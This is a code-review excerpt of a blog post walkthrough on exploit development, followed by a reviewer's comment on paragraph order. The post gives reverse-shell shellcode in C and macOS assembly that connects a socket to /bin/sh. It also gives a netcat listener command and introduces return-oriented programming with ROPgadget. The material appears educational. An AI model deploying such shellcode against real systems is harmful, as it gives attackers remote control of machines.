content/post/walkthrough-exploiting-bugs-to-gain-code-execution.md

```diff
@@ -0,0 +1,338 @@
+
+Traditionally, we would stick our shell code into `_recvBuffer`, then write over a return address on the stack in order to execute it. But any modern system will make the stack and heap both non-executable. The trick here is to use [return-oriented programming](https://en.wikipedia.org/wiki/Return-oriented_programming).
+
+Writing the shell code
+----------------------
+
+First, let's sketch out our shell code in C. The goal here is to be very minimal.
+
+```
+int s = socket(AF_INET, SOCK_STREAM, 0);
+sockaddr_in address;
+address.sin_family = AF_INET;
+inet_pton(AF_INET, "127.0.0.1", &address.sin_addr.s_addr);
+address.sin_port = htons(3000);
+connect(s, (sockaddr*)&address, sizeof(sockaddr_in));
+dup2(s, 2);
+dup2(s, 1);
+dup2(s, 0);
+execve("/bin/sh", nullptr, nullptr);
+```
+
+When executed, this will connect to us on port 3000 with a shell. We can listen for it by simply using netcat: `nc -l 3000`. Then we can use it just like we would a terminal (almost).
+
+The next step... assembly! This in my opinion is the fun part, but can also tricky if you've never done anything in assembly before.
+
+Here's an assembly translation for OSX:
+
+```
+.text
+.globl _main
+
+_main:
+    mov $0x2000061, %rax          # socket
+    xor %rdx, %rdx                # 0 (arg 3)
+    mov $2, %rdi                  # AF_INET (arg 1)
+    mov $1, %rsi                  # SOCK_STREAM (arg 2)
+    syscall
+    mov %eax, %edi                # s
+
+    push %rdx
+    mov $0x0100007fb80b0200, %rax # ip, port, AF_INET
+    push %rax
+
+    mov $0x2000062, %rax          # connect
+    mov %rsp, %rsi                # address
+    mov $16, %dl                  # 16
+    syscall
+
+    mov $3, %rsi
+LC_dup2:
+    mov $0x200005a, %rax          # dup2
+    dec %esi
+    syscall 
+    jg LC_dup2
+
+    mov $0x68732f2f6e69622f, %rax
+    push %rax
+
+    mov $0x200003b, %rax          # execve
+    mov %rsp, %rdi                # "/bin//sh"
+    syscall
+```
+
+Quick OSX primer: All system calls are made via the `syscall` instruction. You select the call you want with `rax`, then pass the parameters through `rdi`, `rsi`, and `rdx`. When the system call returns, `rax` holds the return value.
+
+If you're on OSX and you give that a *.s* extension, you can compile it with clang just like you would a C++ file.
+
+Building the return-oriented program
+------------------------------------
+
+We basically need to find addresses in executable memory that we can jump to in sequence to effectively execute our above shell code. Each of these chainable addresses is referred to as a "gadget".
+
+Before continuing, you make sure you understand exactly how this works by reading up on the [return-oriented programming Wikipedia page](https://en.wikipedia.org/wiki/Return-oriented_programming) or elsewhere.
+
+I'll be using [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) to build this program.
+
+If you run it and just pass our binary, you don't get much to work with:
```

Comment:
Reviewing the part before the code, I feel like it's really disconnected. What about reordering it a little and coalescing related paragraphs?

# Building the return-oriented program

Before continuing, you make sure you understand exactly how ROP works by reading up on the [return-oriented programming Wikipedia page](https://en.wikipedia.org/wiki/Return-oriented_programming).

We basically need to find addresses in executable memory that we can jump to in sequence to effectively execute our above shell code. Each of these chainable addresses is referred to as a "gadget". To assist in finding relevant gadgets, I'll be using [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).

If you run it and just pass our binary, you don't get much to work with:

------

Side note, I don't like the phrase "reading up on the return-oriented programming Wikipedia page or elsewhere". I think elsewhere feels out of place but I can't say exactly why I feel that way.